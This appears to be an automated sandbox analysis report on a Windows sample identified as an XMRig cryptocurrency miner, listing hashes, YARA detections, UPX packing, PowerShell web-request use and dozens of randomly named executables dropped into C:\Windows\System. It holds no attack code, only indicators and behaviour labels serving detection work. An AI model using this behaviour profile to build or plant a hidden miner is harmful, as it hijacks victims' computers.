xmrig | aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95

Analysis

max time kernel
150s
max time network
143s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
09/05/2024, 02:34

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
Size

1.4MB
MD5

2703a31685e01ec940c36502b46286f5
SHA1

41e181f9fda33c678a505a4239ccd02c1eb5dae1
SHA256

aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95
SHA512

6bea8eaaf9da151f9f497fd9ced0f668707964e782585d41a3a64722a22528b221df50591028326014879e97086d743d4fbdc8af963f6d015fa398fafa5467b7
SSDEEP

24576:zv3/fTLF671TilQFG4P5PxtG8PEpklLvYl8UywjwCIlaa+eCppUmggB3XQk:Lz071uv4BPjGhql0lQGQBC38pk

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 20 IoCs

resource	yara_rule
behavioral1/memory/1888-47-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1880-96-0x000000013F050000-0x000000013F442000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2896-94-0x000000013F380000-0x000000013F772000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2888-92-0x000000013F430000-0x000000013F822000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2864-89-0x000000013FFA0000-0x0000000140392000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2952-964-0x000000013FAE0000-0x000000013FED2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2284-52-0x000000013FE30000-0x0000000140222000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2760-51-0x000000013FD60000-0x0000000140152000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2788-49-0x000000013F240000-0x000000013F632000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2680-44-0x000000013F9E0000-0x000000013FDD2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2788-4472-0x000000013F240000-0x000000013F632000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2680-4497-0x000000013F9E0000-0x000000013FDD2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2896-4577-0x000000013F380000-0x000000013F772000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2864-4576-0x000000013FFA0000-0x0000000140392000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2888-4568-0x000000013F430000-0x000000013F822000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2760-4582-0x000000013FD60000-0x0000000140152000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1888-4587-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2544-4623-0x000000013F0B0000-0x000000013F4A2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2296-4594-0x000000013F1E0000-0x000000013F5D2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1880-4640-0x000000013F050000-0x000000013F442000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 55 IoCs

resource	yara_rule
behavioral1/memory/2952-1-0x000000013FAE0000-0x000000013FED2000-memory.dmp	UPX
behavioral1/files/0x000b0000000122ec-6.dat	UPX
behavioral1/memory/2296-11-0x000000013F1E0000-0x000000013F5D2000-memory.dmp	UPX
behavioral1/files/0x003400000001562a-17.dat	UPX
behavioral1/files/0x0007000000004e76-20.dat	UPX
behavioral1/files/0x0008000000015ca2-28.dat	UPX
behavioral1/files/0x0007000000015cb8-33.dat	UPX
behavioral1/files/0x0007000000015cc7-38.dat	UPX
behavioral1/memory/1888-47-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	UPX
behavioral1/files/0x0009000000015ccf-57.dat	UPX
behavioral1/files/0x0007000000015ff4-64.dat	UPX
behavioral1/files/0x00060000000164a9-88.dat	UPX
behavioral1/files/0x0006000000016310-78.dat	UPX
behavioral1/memory/1880-96-0x000000013F050000-0x000000013F442000-memory.dmp	UPX
behavioral1/files/0x0006000000016255-73.dat	UPX
behavioral1/memory/2896-94-0x000000013F380000-0x000000013F772000-memory.dmp	UPX
behavioral1/memory/2888-92-0x000000013F430000-0x000000013F822000-memory.dmp	UPX
behavioral1/memory/2864-89-0x000000013FFA0000-0x0000000140392000-memory.dmp	UPX
behavioral1/files/0x00060000000165a8-98.dat	UPX
behavioral1/files/0x0032000000015678-77.dat	UPX
behavioral1/files/0x0006000000016103-67.dat	UPX
behavioral1/files/0x0006000000016c71-116.dat	UPX
behavioral1/files/0x0006000000016abb-111.dat	UPX
behavioral1/files/0x0006000000016cc3-130.dat	UPX
behavioral1/files/0x0006000000016d4e-158.dat	UPX
behavioral1/memory/2952-964-0x000000013FAE0000-0x000000013FED2000-memory.dmp	UPX
behavioral1/files/0x0006000000016d71-174.dat	UPX
behavioral1/files/0x0006000000016d69-170.dat	UPX
behavioral1/files/0x0006000000016d65-166.dat	UPX
behavioral1/files/0x0006000000016d61-162.dat	UPX
behavioral1/files/0x0006000000016d45-154.dat	UPX
behavioral1/files/0x0006000000016d3d-150.dat	UPX
behavioral1/files/0x0006000000016d34-146.dat	UPX
behavioral1/files/0x0006000000016d2c-142.dat	UPX
behavioral1/files/0x0006000000016d1b-138.dat	UPX
behavioral1/files/0x0006000000016ce7-134.dat	UPX
behavioral1/files/0x0006000000016c7a-126.dat	UPX
behavioral1/files/0x0006000000016c56-112.dat	UPX
behavioral1/files/0x000600000001686d-105.dat	UPX
behavioral1/files/0x000600000001663f-103.dat	UPX
behavioral1/memory/2284-52-0x000000013FE30000-0x0000000140222000-memory.dmp	UPX
behavioral1/memory/2760-51-0x000000013FD60000-0x0000000140152000-memory.dmp	UPX
behavioral1/memory/2544-60-0x000000013F0B0000-0x000000013F4A2000-memory.dmp	UPX
behavioral1/memory/2788-49-0x000000013F240000-0x000000013F632000-memory.dmp	UPX
behavioral1/memory/2680-44-0x000000013F9E0000-0x000000013FDD2000-memory.dmp	UPX
behavioral1/memory/2788-4472-0x000000013F240000-0x000000013F632000-memory.dmp	UPX
behavioral1/memory/2680-4497-0x000000013F9E0000-0x000000013FDD2000-memory.dmp	UPX
behavioral1/memory/2896-4577-0x000000013F380000-0x000000013F772000-memory.dmp	UPX
behavioral1/memory/2864-4576-0x000000013FFA0000-0x0000000140392000-memory.dmp	UPX
behavioral1/memory/2888-4568-0x000000013F430000-0x000000013F822000-memory.dmp	UPX
behavioral1/memory/2760-4582-0x000000013FD60000-0x0000000140152000-memory.dmp	UPX
behavioral1/memory/1888-4587-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	UPX
behavioral1/memory/2544-4623-0x000000013F0B0000-0x000000013F4A2000-memory.dmp	UPX
behavioral1/memory/2296-4594-0x000000013F1E0000-0x000000013F5D2000-memory.dmp	UPX
behavioral1/memory/1880-4640-0x000000013F050000-0x000000013F442000-memory.dmp	UPX

XMRig Miner payload 21 IoCs

miner

resource	yara_rule
behavioral1/memory/2952-46-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	xmrig
behavioral1/memory/1888-47-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	xmrig
behavioral1/memory/1880-96-0x000000013F050000-0x000000013F442000-memory.dmp	xmrig
behavioral1/memory/2896-94-0x000000013F380000-0x000000013F772000-memory.dmp	xmrig
behavioral1/memory/2888-92-0x000000013F430000-0x000000013F822000-memory.dmp	xmrig
behavioral1/memory/2864-89-0x000000013FFA0000-0x0000000140392000-memory.dmp	xmrig
behavioral1/memory/2952-964-0x000000013FAE0000-0x000000013FED2000-memory.dmp	xmrig
behavioral1/memory/2284-52-0x000000013FE30000-0x0000000140222000-memory.dmp	xmrig
behavioral1/memory/2760-51-0x000000013FD60000-0x0000000140152000-memory.dmp	xmrig
behavioral1/memory/2788-49-0x000000013F240000-0x000000013F632000-memory.dmp	xmrig
behavioral1/memory/2680-44-0x000000013F9E0000-0x000000013FDD2000-memory.dmp	xmrig
behavioral1/memory/2788-4472-0x000000013F240000-0x000000013F632000-memory.dmp	xmrig
behavioral1/memory/2680-4497-0x000000013F9E0000-0x000000013FDD2000-memory.dmp	xmrig
behavioral1/memory/2896-4577-0x000000013F380000-0x000000013F772000-memory.dmp	xmrig
behavioral1/memory/2864-4576-0x000000013FFA0000-0x0000000140392000-memory.dmp	xmrig
behavioral1/memory/2888-4568-0x000000013F430000-0x000000013F822000-memory.dmp	xmrig
behavioral1/memory/2760-4582-0x000000013FD60000-0x0000000140152000-memory.dmp	xmrig
behavioral1/memory/1888-4587-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	xmrig
behavioral1/memory/2544-4623-0x000000013F0B0000-0x000000013F4A2000-memory.dmp	xmrig
behavioral1/memory/2296-4594-0x000000013F1E0000-0x000000013F5D2000-memory.dmp	xmrig
behavioral1/memory/1880-4640-0x000000013F050000-0x000000013F442000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2172	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2296	FvcbqPc.exe
2284	GvhLzdZ.exe
2680	HpMGuFQ.exe
1888	AavqXUo.exe
2788	CHivaCe.exe
2760	lAJpuXr.exe
2544	mapaMRB.exe
1880	sxJLXoS.exe
2864	fFcVoTz.exe
2888	cEwrnZO.exe
2896	lsdXJWU.exe
3064	ulCjThw.exe
2948	xqfnURL.exe
1980	oyWzqHz.exe
328	PfBedDQ.exe
1912	hmoepOK.exe
304	JahpZfl.exe
1956	ykIBCoF.exe
2852	jikdNcd.exe
1636	nKWSUte.exe
1516	TJMWAgh.exe
2044	xsVRpgX.exe
2068	IpBTjEa.exe
2040	tcRcBJs.exe
2916	UFddIiS.exe
2752	HvycKtR.exe
2016	XuvOhPK.exe
536	HuygIKz.exe
796	pAZokzm.exe
1056	gzLDtJy.exe
1496	nDBmlhz.exe
1484	jffAEeg.exe
2376	kYCSSFG.exe
1920	zcUjyHs.exe
1396	gYcWuBW.exe
980	fqtVSGB.exe
1684	gYMtrXj.exe
2264	ieGIUhn.exe
844	qWsVoQf.exe
2496	EqzyVuR.exe
1672	WBaARcT.exe
1668	iwVpbNP.exe
1988	WGHezTr.exe
948	OccQOxa.exe
2004	XzKLudI.exe
1824	oNDcCzA.exe
1612	vrSVykl.exe
1656	PXIQqtI.exe
1060	nELfkrj.exe
908	HAsuBQh.exe
692	CHbFjOW.exe
2428	PEpQeoy.exe
2236	hLJxLCB.exe
572	elfqBCI.exe
2448	KCaFkts.exe
884	YpcsCNB.exe
1276	gzswVfg.exe
1744	QepGTGH.exe
2180	bjapgSz.exe
1336	tSgNBdk.exe
2812	lvalZtG.exe
2452	xjMEbfZ.exe
1588	KvOyLGC.exe
1596	ovJHXjx.exe

Loads dropped DLL 64 IoCs

pid	Process
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
2952	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2952-1-0x000000013FAE0000-0x000000013FED2000-memory.dmp	upx
behavioral1/files/0x000b0000000122ec-6.dat	upx
behavioral1/memory/2296-11-0x000000013F1E0000-0x000000013F5D2000-memory.dmp	upx
behavioral1/files/0x003400000001562a-17.dat	upx
behavioral1/files/0x0007000000004e76-20.dat	upx
behavioral1/files/0x0008000000015ca2-28.dat	upx
behavioral1/files/0x0007000000015cb8-33.dat	upx
behavioral1/files/0x0007000000015cc7-38.dat	upx
behavioral1/memory/1888-47-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	upx
behavioral1/files/0x0009000000015ccf-57.dat	upx
behavioral1/files/0x0007000000015ff4-64.dat	upx
behavioral1/files/0x00060000000164a9-88.dat	upx
behavioral1/files/0x0006000000016310-78.dat	upx
behavioral1/memory/1880-96-0x000000013F050000-0x000000013F442000-memory.dmp	upx
behavioral1/files/0x0006000000016255-73.dat	upx
behavioral1/memory/2896-94-0x000000013F380000-0x000000013F772000-memory.dmp	upx
behavioral1/memory/2888-92-0x000000013F430000-0x000000013F822000-memory.dmp	upx
behavioral1/memory/2864-89-0x000000013FFA0000-0x0000000140392000-memory.dmp	upx
behavioral1/files/0x00060000000165a8-98.dat	upx
behavioral1/files/0x0032000000015678-77.dat	upx
behavioral1/files/0x0006000000016103-67.dat	upx
behavioral1/files/0x0006000000016c71-116.dat	upx
behavioral1/files/0x0006000000016abb-111.dat	upx
behavioral1/files/0x0006000000016cc3-130.dat	upx
behavioral1/files/0x0006000000016d4e-158.dat	upx
behavioral1/memory/2952-964-0x000000013FAE0000-0x000000013FED2000-memory.dmp	upx
behavioral1/files/0x0006000000016d71-174.dat	upx
behavioral1/files/0x0006000000016d69-170.dat	upx
behavioral1/files/0x0006000000016d65-166.dat	upx
behavioral1/files/0x0006000000016d61-162.dat	upx
behavioral1/files/0x0006000000016d45-154.dat	upx
behavioral1/files/0x0006000000016d3d-150.dat	upx
behavioral1/files/0x0006000000016d34-146.dat	upx
behavioral1/files/0x0006000000016d2c-142.dat	upx
behavioral1/files/0x0006000000016d1b-138.dat	upx
behavioral1/files/0x0006000000016ce7-134.dat	upx
behavioral1/files/0x0006000000016c7a-126.dat	upx
behavioral1/files/0x0006000000016c56-112.dat	upx
behavioral1/files/0x000600000001686d-105.dat	upx
behavioral1/files/0x000600000001663f-103.dat	upx
behavioral1/memory/2284-52-0x000000013FE30000-0x0000000140222000-memory.dmp	upx
behavioral1/memory/2760-51-0x000000013FD60000-0x0000000140152000-memory.dmp	upx
behavioral1/memory/2544-60-0x000000013F0B0000-0x000000013F4A2000-memory.dmp	upx
behavioral1/memory/2788-49-0x000000013F240000-0x000000013F632000-memory.dmp	upx
behavioral1/memory/2680-44-0x000000013F9E0000-0x000000013FDD2000-memory.dmp	upx
behavioral1/memory/2788-4472-0x000000013F240000-0x000000013F632000-memory.dmp	upx
behavioral1/memory/2680-4497-0x000000013F9E0000-0x000000013FDD2000-memory.dmp	upx
behavioral1/memory/2896-4577-0x000000013F380000-0x000000013F772000-memory.dmp	upx
behavioral1/memory/2864-4576-0x000000013FFA0000-0x0000000140392000-memory.dmp	upx
behavioral1/memory/2888-4568-0x000000013F430000-0x000000013F822000-memory.dmp	upx
behavioral1/memory/2760-4582-0x000000013FD60000-0x0000000140152000-memory.dmp	upx
behavioral1/memory/1888-4587-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	upx
behavioral1/memory/2544-4623-0x000000013F0B0000-0x000000013F4A2000-memory.dmp	upx
behavioral1/memory/2296-4594-0x000000013F1E0000-0x000000013F5D2000-memory.dmp	upx
behavioral1/memory/1880-4640-0x000000013F050000-0x000000013F442000-memory.dmp	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\ynsHpSP.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\eWnFgrU.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\MNEfeOc.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\wIIWLVL.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\gNFhiFO.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\gvhYJjC.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\QQFtUaG.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\WCzYlyW.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\uTYYgxI.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\lhmtIZT.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\JfjCJfD.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\KpgDgyO.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\cEEpNxp.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\RSmAwcN.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\DEbnJVy.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\pQHkIdn.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\RvHoMNd.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\lZTxxmL.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\AqbAIjj.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\uWJxnQx.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\laeSSDr.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\ccUIkUQ.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\edXxtfg.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\JuhmRbh.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\LUFRtGh.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\kJxZhFM.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\HcGmjIu.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\PXIQqtI.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\eNEPyiK.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\aoDpDPZ.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\yHWwoIm.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\lunFPrf.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\lAJpuXr.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\ArPLDST.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\jsIIAGE.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\cbtNJnf.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\rVMsYqz.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\KtMhVGg.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\KIHnUUU.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\Lyxypoi.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\fuxtjky.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\aZGNqsP.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\vslNweW.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\kAHJFtf.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\JDRvDmW.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\SwCWxyU.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\hGQDMMX.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\shAvHVl.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\OFPyLuE.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\KLDXUbJ.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\JslCfux.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\lXOeMsU.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\lbnYDob.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\QQAtqZx.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\ylFkucX.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\zThIMBw.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
File created	C:\Windows\System\mMCjzuX.exe	aace21f5650297ad74807a32a81e91ca3cfc9a9e23e5631df02390f4b36f0b95.exe
